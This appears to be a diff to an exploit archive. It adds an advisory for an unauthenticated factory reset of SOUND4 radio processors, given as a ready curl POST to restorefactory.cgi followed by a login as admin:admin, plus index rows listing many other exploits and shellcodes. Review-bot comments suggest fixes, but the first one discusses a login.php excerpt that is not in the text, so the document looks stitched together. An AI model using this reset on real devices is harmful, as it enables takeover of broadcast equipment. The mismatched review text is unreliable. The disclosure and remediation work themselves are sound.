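Review bot: Line 13 of the quoted `login.php` concatenates `$_POST['password']` and `$_POST['username']` into a shell command before any authentication has happened, and the entry records no remediation. The minimal fix is to quote both values, `exec('echo ' . escapeshellarg($_POST['password']) . ' | /opt/sound4/sound4server _check_pwd_ ' . escapeshellarg($_POST['username']), $out, $ret);`, though handing the password to the helper on stdin via `proc_open()` without a shell is safer. The comment on line 12 also suggests that `admin/admin` is accepted as a fallback credential, which deserves its own line in the advisory. The excerpt starts at line 09 and the `if` block continues beyond what is quoted.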


@ -0,0 +1,68 @@
# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice Processing:
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.
With its advanced functionalities and impressive versatility, SOUND4
PULSE gives clients the ultimate price - performance ratio, providing
much more than just a processor. Flexible and powerful, it ensures perfect
sound quality and full compatibility with radio broadcasting standards
and can be used simultaneously for FM and HD, DAB, DRM or streaming.
SOUND4 FIRST provides all the most important functionalities you need
in an FM/HD processor and sets the bar high both in terms of performance
and affordability. Designed to deliver a sound of uncompromising quality,
this tool gives you 2-band processing, a digital stereo generator and an
IMPACT Clipper.
Desc: The device allows unauthenticated attackers to visit the unprotected
/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory
default configuration. Once a POST request is made, the device will reboot
with its default settings allowing the attacker to bypass authentication
and take full control of the system.
Tested on: Apache/2.4.25 (Unix)
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2022-5742
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php
26.09.2022
--
> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \
> sleep 120
#login admin:admin
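Review bot: The entry gives no remediation for an endpoint that wipes the configuration without authentication. I would add `# Fix: require an authenticated admin session and an anti-CSRF token on restorefactory.cgi, and force a password change on first login after any reset`. The closing `#login admin:admin` line shows that factory defaults re-enable a known credential, which is what turns a reset into full takeover. Operators should also keep the management interface off untrusted networks until a fixed firmware is confirmed.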


@ -924,6 +924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443,2018-02-16,2018-02-28,1,CVE-2016-6272,,,,,
34864,exploits/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",webapps,asp,443,2014-10-02,2014-10-02,0,CVE-2014-4312;OSVDB-114150;OSVDB-112471;OSVDB-112470;OSVDB-112469;OSVDB-112467;OSVDB-112466;OSVDB-112465;CVE-2014-4311;OSVDB-112464,,,,,
27844,exploits/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - 'Moreinfo.asp' Cross-Site Scripting",2006-05-09,Dj_Eyes,webapps,asp,,2006-05-09,2013-08-25,1,CVE-2006-2306;OSVDB-25330,,,,,https://www.securityfocus.com/bid/17907/info
51154,exploits/asp/webapps/51154.txt,"EQ Enterprise management system v2.2.0 - SQL Injection",2023-03-31,TLF,webapps,asp,,2023-03-31,2023-03-31,0,CVE-2022-45297,,,,,
17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,webapps,asp,,2011-06-09,2011-06-09,1,,,,,,
7801,exploits/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp,,2009-01-15,,1,OSVDB-51456;CVE-2009-0252,,,,,
11023,exploits/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,webapps,asp,,2010-01-05,,1,OSVDB-61596;CVE-2010-1064,,,,,
@ -3142,6 +3143,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,,2019-04-22,2019-04-22,0,CVE-2019-7181,,,,,
40985,exploits/hardware/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,hardware,,2017-01-02,2018-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-91824-am.png,,https://www.securityfocus.com/archive/1/539978
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS Devices - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,,2017-02-01,2022-11-21,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/QNAP%20NVR%20NAS%20Heap%20-%20Stack%20-%20Heap%20Feng%20Shui%20overflow%20and%20%22Heack%20Combo%22%20to%20pwn.txt
51157,exploits/hardware/dos/51157.py,"qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)",2023-03-31,"Krzysztof Burghardt",dos,hardware,,2023-03-31,2023-03-31,0,CVE-2022-46770,,,,,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,,2018-01-23,2018-01-23,0,CVE-2018-5319,,,,,
11597,exploits/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,dos,hardware,,2010-02-27,,0,CVE-2010-1544;OSVDB-62713,,,,,
23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",dos,hardware,,2004-02-09,2012-12-25,1,CVE-2004-2078;OSVDB-3891,,,,,https://www.securityfocus.com/bid/9618/info
@ -3302,6 +3304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9066,exploits/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,remote,hardware,,2009-06-30,,1,OSVDB-55548;CVE-2009-2306,,,,,
32440,exploits/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,remote,hardware,22,2014-03-22,2014-03-22,1,OSVDB-104652,"Metasploit Framework (MSF)",,,,
50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",2021-07-16,Gr33nh4t,remote,hardware,,2021-07-16,2021-07-16,0,CVE-2021-25155,,,,,
51155,exploits/hardware/remote/51155.sh,"ASKEY RTF3505VW-N1 - Privilege Escalation",2023-03-31,"Leonardo Nicolas Servalli",remote,hardware,,2023-03-31,2023-03-31,0,,,,,,
8846,exploits/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,remote,hardware,,2009-05-31,,1,OSVDB-54895,,,,,
42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,,
36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info
@ -14336,6 +14339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info
28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info
28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info
51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip,
17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,,
9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php,,2009-08-06,,1,CVE-2009-5003;OSVDB-68191,,,,,
@ -14743,6 +14747,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28800,exploits/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php,,2006-10-13,2017-10-13,1,CVE-2006-6592;OSVDB-32431,,,,,https://www.securityfocus.com/bid/20512/info
12729,exploits/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,webapps,php,,2010-05-23,,1,,,,,,
48746,exploits/php/webapps/48746.rb,"Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php,,2020-08-17,2020-11-13,1,CVE-2019-17240,,,,,
51160,exploits/php/webapps/51160.txt,"Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
50529,exploits/php/webapps/50529.txt,"Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)",2021-11-17,Vasu,webapps,php,,2021-11-17,2021-11-17,0,CVE-2021-35323,,,,http://www.exploit-db.combludit-3-13-1.zip,
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
@ -15026,6 +15031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,,
33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
51166,exploits/php/webapps/51166.py,"Cacti v1.2.22 - Remote Command Execution (RCE)",2023-03-31,"Riadh Bouchahoua",webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-46169,,,,,
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,,2020-03-02,2020-03-02,0,,,,,,
7480,exploits/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,webapps,php,,2008-12-14,2017-01-05,1,OSVDB-51063;CVE-2008-5777,,,,,
3237,exploits/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,webapps,php,,2007-01-30,,1,OSVDB-33631;CVE-2007-0677,,,,,
@ -21712,6 +21718,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3113,exploits/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,webapps,php,,2007-01-09,2016-11-16,1,OSVDB-33459;CVE-2007-0232,,,,,
6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php,,2008-07-11,2016-12-13,1,OSVDB-47025;CVE-2008-7301;OSVDB-47024;CVE-2008-3193;OSVDB-47023;CVE-2008-3192,,,,,
11445,exploits/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,webapps,php,,2010-02-13,,1,OSVDB-62329;CVE-2010-0691,,,,,
51165,exploits/php/webapps/51165.txt,"Judging Management System v1.0 - Authentication Bypass",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
51164,exploits/php/webapps/51164.py,"Judging Management System v1.0 - Remote Code Execution (RCE)",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php,,2007-04-24,2016-09-30,1,OSVDB-35387;CVE-2007-2324,,,,http://www.exploit-db.comjulma.zip,
2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php,,2006-10-22,,1,OSVDB-35737;CVE-2006-6635,,,,,
29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php,,2013-11-25,2013-11-25,0,CVE-2013-6618;OSVDB-92227,,,,,
@ -28262,6 +28270,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,"Murat ŞEKER",webapps,php,,2021-03-15,2021-03-15,0,,,,,,
49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload",2021-04-21,"Vishwaraj Bhattrai",webapps,php,,2021-04-21,2021-10-28,0,,,,,,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",2021-03-18,"Murat ŞEKER",webapps,php,,2021-03-18,2021-10-28,0,,,,,,
51163,exploits/php/webapps/51163.py,"rconfig 3.9.7 - Sql Injection (Authenticated)",2023-03-31,azhen,webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-45030,,,,,
48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-10221,,,,,
9552,exploits/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php?op' SQL Injection",2009-08-31,Mr.SQL,webapps,php,,2009-08-30,,1,,,,,,
11943,exploits/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,webapps,php,,2010-03-28,,1,,,,,,
@ -28850,6 +28859,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info
34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,,
48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,,
51161,exploits/php/webapps/51161.txt,"Senayan Library Management System v9.0.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz,
3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz,
@ -29697,6 +29707,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info
35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",webapps,php,,2011-03-29,2014-12-15,1,,,,,,https://www.securityfocus.com/bid/47077/info
51162,exploits/php/webapps/51162.txt,"Spitfire CMS 1.0.475 - PHP Object Injection",2023-03-31,LiquidWorm,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
27601,exploits/php/webapps/27601.txt,"Spitfire CMS 1.1.4 - Cross-Site Request Forgery",2013-08-15,"Yashar shahinzadeh",webapps,php,,2013-08-15,2013-08-15,0,OSVDB-66409,,,,,
32554,exploits/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",webapps,php,,2008-10-31,2014-03-27,1,OSVDB-106996,,,,,https://www.securityfocus.com/bid/32012/info
21514,exploits/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,webapps,php,,2002-06-06,2012-09-24,1,CVE-2002-0959;OSVDB-9233,,,,,https://www.securityfocus.com/bid/4953/info
@ -30216,6 +30227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36489,exploits/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",webapps,php,,2012-01-04,2015-03-25,1,CVE-2011-5019;OSVDB-78133,,,,,https://www.securityfocus.com/bid/51254/info
44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,,2018-03-12,2018-03-12,0,CVE-2018-7474,,,,,
49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
51176,exploits/php/webapps/51176.txt,"Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
14823,exploits/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,webapps,php,,2010-08-28,2010-08-28,0,CVE-2010-3205;OSVDB-67800,,,,http://www.exploit-db.comtextpattern-4.2.0.tar.gz,
48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,,2020-10-07,2020-10-07,0,,,,,,
48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,,2020-10-19,2020-10-19,0,,,,,,
@ -32096,6 +32108,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49154,exploits/php/webapps/49154.py,"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution",2020-12-02,zetc0de,webapps,php,,2020-12-02,2021-04-21,0,CVE-2020-35313,,,,,
1982,exploits/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,webapps,php,,2006-07-03,,1,OSVDB-34426;CVE-2006-3422,,,,,
44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,,2018-04-09,2018-04-09,0,,,,,,
51156,exploits/php/webapps/51156.txt,"WooCommerce v7.1.0 - Remote Code Execution(RCE)",2023-03-31,"Milad karimi",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php,,2010-05-10,,1,,,,,,
50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
@ -39240,6 +39253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,,
50690,exploits/windows/local/50690.txt,"CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path",2022-02-02,"Angel Canseco",local,windows,,2022-02-02,2022-02-02,0,,,,,,
47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,,2019-11-12,2019-11-12,0,,,,,,
51159,exploits/windows/local/51159.txt,"CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path",2023-03-31,"Damian Semon Jr",local,windows,,2023-03-31,2023-03-31,0,,,,,,
39594,exploits/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Local Stack Overflow",2016-03-22,"Charley Celice",local,windows,,2016-03-22,2016-03-23,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-03-23-at-150050.png,http://www.exploit-db.comCoolPlayer219_Bin.zip,
4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,local,windows,,2008-01-04,2016-11-14,1,CVE-2006-6288,,,,http://www.exploit-db.comCoolPlayer217_Bin.zip,
6157,exploits/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",local,windows,,2008-07-28,2016-12-14,1,OSVDB-47194;CVE-2008-3408,,,,,
@ -40926,6 +40940,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8624,exploits/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)",2009-05-07,Stack,local,windows,,2009-05-06,,1,OSVDB-54562;CVE-2009-1643,,,,http://www.exploit-db.comsoritong10.exe,
44896,exploits/windows/local/44896.vb,"Soroush IM Desktop App 0.15 (beta) - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,,2018-06-15,2018-06-19,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,http://www.exploit-db.comSoroush-0.15.0.exe,
45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,,2018-08-09,2018-09-04,0,,,,,http://www.exploit-db.comSoroushSetup0.17.0(1).exe,
51170,exploits/windows/local/51170.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51169,exploits/windows/local/51169.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51171,exploits/windows/local/51171.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51168,exploits/windows/local/51168.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51172,exploits/windows/local/51172.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51173,exploits/windows/local/51173.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51174,exploits/windows/local/51174.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51167,exploits/windows/local/51167.txt,"SOUND4 Server Service 4.1.102 - Local Privilege Escalation",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
9970,exploits/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Local Privilege Escalation",2009-10-20,bellick,local,windows,,2009-10-19,,1,,,,,,
11264,exploits/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,local,windows,,2010-01-25,2010-06-27,0,CVE-2009-4606;OSVDB-59080,,,,http://www.exploit-db.comwebdrive.exe,
49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,,


@ -831,6 +831,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",,macos,31,2019-02-18,2019-05-23,0,,,,,,
46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",,macos,103,2019-02-18,2019-02-18,0,,,,,,
46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",,macos,119,2019-02-18,2019-05-23,0,,,,,,
51177,shellcodes/macos/51177.txt,"macOS/x64 - Execve Null-Free Shellcode",2023-03-31,boku,,macos,253,2023-03-31,2023-03-31,0,,,,,,
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,,multiple,194,2016-06-16,2018-01-21,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png,,
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,,multiple,38,2004-09-11,,1,,,,,,
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",,multiple,99,2005-11-14,,1,,,,,,

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
831 46397 shellcodes/macos/46397.c Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) 2019-02-18 Ken Kitahara macos 31 2019-02-18 2019-05-23 0
832 46395 shellcodes/macos/46395.c Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2019-02-18 Ken Kitahara macos 103 2019-02-18 2019-02-18 0
833 46393 shellcodes/macos/46393.c Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes) 2019-02-18 Ken Kitahara macos 119 2019-02-18 2019-05-23 0
